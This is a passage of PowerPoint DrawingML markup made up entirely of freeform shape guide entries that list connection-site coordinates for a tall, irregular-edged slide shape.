              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 270395 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 460893 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 505401 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 463335 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 448810 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 430843 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 444782 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448545 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3813873 h 6858000"/>
